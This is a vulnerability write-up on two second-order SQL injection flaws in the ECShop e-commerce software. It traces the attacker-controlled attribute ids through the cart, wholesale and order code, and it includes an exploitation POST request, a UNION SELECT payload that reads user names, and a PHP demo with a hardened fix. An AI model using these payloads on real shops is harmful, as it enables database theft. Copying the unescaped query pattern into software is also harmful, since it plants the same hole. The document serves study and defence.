I. Second-order injection via goods_attr_id
Injection and exploitation process:
1. When adding a product to the shopping cart, put the injection payload in the product attribute id (the spec field):
http://localhost/test/ecshop/flow.php?step=add_to_cart
POST: goods={"quick":1,"spec":["163","158'"],"goods_id":32,"number":"1","parent":0}
Note that spec must contain two or more ids.
2. On the "view shopping cart" page, click "Update Shopping Cart". The stored attribute ids are read back from the cart row and concatenated into a query, so the payload executes here (second-order injection: the single quote survives storage unescaped, so quotes are usable in the payload).
Code analysis
1. /includes/lib_goods.php, line 942:
function spec_price($spec)
{
    if (!empty($spec))
    {
        $where = db_create_in($spec, 'goods_attr_id'); // injection point: the ids are quoted but never escaped or cast
        $sql   = 'SELECT SUM(attr_price) AS attr_price FROM ' . $GLOBALS['ecs']->table('goods_attr') . " WHERE $where";
        $price = floatval($GLOBALS['db']->getOne($sql));
    }
    else
    {
        $price = 0;
    }
    return $price;
}
2. get_final_price() in /includes/lib_common.php calls spec_price() with the attribute id list it is given.
3. Now look at where flow_update_cart() in /flow.php calls get_final_price():
/* process ordinary goods or non-promotional accessories */
else
{
    // $attr_id comes from the goods_attr_id column of the cart row that was just read back from the database,
    // so the payload only has to be written once, when the item is added to the cart
    $attr_id     = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
    $goods_price = get_final_price($goods['goods_id'], $val, true, $attr_id);

    /* update the quantity of the item in the cart */
    $sql = "UPDATE " . $GLOBALS['ecs']->table('cart') .
           " SET goods_number = '$val', goods_price = '$goods_price'" .
           " WHERE rec_id = '$key' AND session_id = '" . SESS_ID . "'";
}
II. Second-order injection via goods_attr
1. Insert the injection payload into the goods_attr field of an order item. /wholesale.php (the wholesale product page) allows this.
2. Open the order created in step 1 on the user center order view page and perform the "return to shopping cart" operation.
3. View the shopping cart page: the stored payload is concatenated into a query and executes.
Code analysis:
1. /includes/lib_order.php, get_cart_goods() (reads the items in the shopping cart), starting at line 1626:
/* query attributes */
if (trim($row['goods_attr']) != '')
{
    // goods_attr is read from the cart row, so any payload that reached the cart table is concatenated
    // here unescaped; this is what makes the injection second-order
    $sql = "SELECT attr_value FROM " . $GLOBALS['ecs']->table('goods_attr') .
           " WHERE goods_attr_id " . db_create_in($row['goods_attr']);
    $attr_list = $GLOBALS['db']->getCol($sql);
    foreach ($attr_list AS $attr)
    {
        $row['goods_name'] .= ' [' . $attr . ']'; // a UNION SELECT payload returns arbitrary database content, which is rendered on the page here
    }
}
2. /wholesale.php, act=add_to_cart (adds the item to the "cart", which for wholesale orders is actually $_SESSION):
/*------------------------------------------------------ */
//-- add to cart
/*------------------------------------------------------ */
elseif ($_REQUEST['act'] == 'add_to_cart')
{
    /* get the parameters */
    $act_id       = intval($_POST['act_id']);
    $goods_number = $_POST['goods_number'][$act_id];
    $attr_id      = isset($_POST['attr_id']) ? $_POST['attr_id'] : array();
    if (isset($attr_id[$act_id]))
    {
        $goods_attr = $attr_id[$act_id]; // attacker-controlled: taken straight from the POST data
    }
    ...
3. /wholesale.php, act=submit_order: the data held in $_SESSION is written into the order:
/* insert the order items */
foreach ($_SESSION['wholesale_goods'] as $goods)
{
    $product_id = 0;
    if (!empty($goods['goods_attr_id']))
    {
        $goods_attr_id = array();
        foreach ($goods['goods_attr_id'] as $value)
        {
            $goods_attr_id[$value['attr_id']] = $value['attr_val_id'];
        }
        ksort($goods_attr_id);
        $goods_attr = implode('|', $goods_attr_id);
        $sql = "SELECT product_id FROM " . $ecs->table('products') .
               " WHERE goods_attr = '$goods_attr' AND goods_id = '" . $goods['goods_id'] . "'";
        $product_id = $db->getOne($sql);
    }
    $sql = "INSERT " . $ecs->table('order_goods') . "(" .
           "order_id, goods_id, goods_name, goods_sn, product_id, goods_number, market_price, " .
           "goods_price, goods_attr, is_real, extension_code, parent_id, is_gift) " .
           "SELECT '$new_order_id', goods_id, goods_name, goods_sn, '$product_id', '$goods[goods_number]', market_price, " .
           "'$goods[goods_price]', '$goods[goods_attr]', is_real, extension_code, 0, 0 " .
           "FROM " . $ecs->table('goods') . " WHERE goods_id = '$goods[goods_id]'";
    $db->query($sql); // the session value of goods_attr is stored in order_goods
}
4. After step 3 the payload sits in the order item table (order_goods). To move it into the cart table (cart), view the order in the user center and use the "return to shopping cart" operation: the order items are copied into the cart table, and the payload then fires on the shopping cart page /flow.php (see code analysis item 1).
/includes/lib_transaction.php, return_to_cart():
...
// the item to be returned to the cart, around line 923
$return_goods = array(
    'goods_id'       => $row['goods_id'],
    'goods_sn'       => addslashes($goods['goods_sn']),
    'goods_name'     => addslashes($goods['goods_name']),
    'market_price'   => $goods['market_price'],
    'goods_price'    => $goods['goods_price'],
    'goods_number'   => $row['goods_number'],
    // $row is the order_goods record. addslashes() only protects this INSERT into the cart table;
    // the stored value is unescaped again once in the database and is later concatenated into a
    // query without escaping (see code analysis item 1), which is why this is a second-order injection
    'goods_attr'     => empty($row['goods_attr'])    ? '' : addslashes($row['goods_attr']),
    'goods_attr_id'  => empty($row['goods_attr_id']) ? '' : $row['goods_attr_id'],
    'is_real'        => $goods['is_real'],
    'extension_code' => addslashes($goods['extension_code']),
    'parent_id'      => '0',
    'is_gift'        => '0',
    'rec_type'       => CART_GENERAL_GOODS
);
...
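To make both data flows concrete, the following is an added example written for this page; it is not ECShop code. It reproduces db_create_in() from includes/lib_base.php as recalled by the editor (a given release may differ in detail), builds the exact SQL that spec_price() in part I and get_cart_goods() in part II would run on stored cart values, and contrasts them with a hardened helper that casts every id to an integer. The table prefix ecs_, the ecs_users table and user_name column used in the UNION payload, and the stored values are assumptions.

```php
<?php
// Added example, not ECShop code. db_create_in() below is a from-memory copy of
// ECShop's includes/lib_base.php helper; table names assume the default 'ecs_' prefix.

function db_create_in($item_list, $field_name = '')
{
    if (empty($item_list))
    {
        return $field_name . " IN ('') ";
    }
    if (!is_array($item_list))
    {
        $item_list = explode(',', $item_list);
    }
    $item_list     = array_unique($item_list);
    $item_list_tmp = '';
    foreach ($item_list AS $item)
    {
        if ($item !== '')
        {
            // every id is wrapped in quotes but neither escaped nor cast: the injection point
            $item_list_tmp .= $item_list_tmp ? ",'$item'" : "'$item'";
        }
    }
    return empty($item_list_tmp) ? $field_name . " IN ('') "
                                 : $field_name . ' IN (' . $item_list_tmp . ') ';
}

/* Part I: the goods_attr_id column of a cart row, as flow_update_cart() hands it to spec_price() */
function spec_price_sql($goods_attr_id_column, $create_in = 'db_create_in')
{
    $attr_id = empty($goods_attr_id_column) ? array() : explode(',', $goods_attr_id_column);
    $where   = $create_in($attr_id, 'goods_attr_id');
    return 'SELECT SUM(attr_price) AS attr_price FROM ecs_goods_attr WHERE ' . $where;
}

/* Part II: the goods_attr column of a cart row, as get_cart_goods() uses it */
function cart_attr_sql($goods_attr_column, $create_in = 'db_create_in')
{
    return 'SELECT attr_value FROM ecs_goods_attr WHERE goods_attr_id ' . $create_in($goods_attr_column);
}

/* Hardened variant (assumption, not an ECShop function): attribute ids are integers,
   so cast each one before it reaches the query. Applied on the read side it covers
   every write path into cart and order_goods, which addslashes() at one INSERT does not. */
function db_create_in_int($item_list, $field_name = '')
{
    if (!is_array($item_list))
    {
        $item_list = explode(',', (string) $item_list);
    }
    $ids = array_unique(array_map('intval', $item_list));
    if (empty($ids))
    {
        return $field_name . " IN ('') ";
    }
    return $field_name . ' IN (' . implode(',', $ids) . ') ';
}

// Constructed stored values: what the cart row holds after the two write-ups' steps.
$stored_goods_attr_id = "163,158'";                                        // part I: the quote from the add_to_cart request
$stored_goods_attr    = "1') UNION SELECT user_name FROM ecs_users #";     // part II: hypothetical UNION payload via goods_attr

echo "vulnerable, part I:  ", spec_price_sql($stored_goods_attr_id), "\n";
echo "vulnerable, part II: ", cart_attr_sql($stored_goods_attr), "\n";
echo "hardened,   part I:  ", spec_price_sql($stored_goods_attr_id, 'db_create_in_int'), "\n";
echo "hardened,   part II: ", cart_attr_sql($stored_goods_attr, 'db_create_in_int'), "\n";
```

Run it with php on the command line. The first vulnerable query ends in goods_attr_id IN ('163','158''), the unbalanced quote the part I steps use to confirm the injection; the second ends in IN ('1') UNION SELECT user_name FROM ecs_users #'), so the UNION row comes back as an attr_value and is appended to goods_name by the foreach in get_cart_goods(). With db_create_in_int() both collapse to plain integer lists. Note that db_create_in() splits a string on commas and quotes each piece separately, so a payload that needs a comma has to arrive as an array element (as the part I spec array does) rather than inside one string.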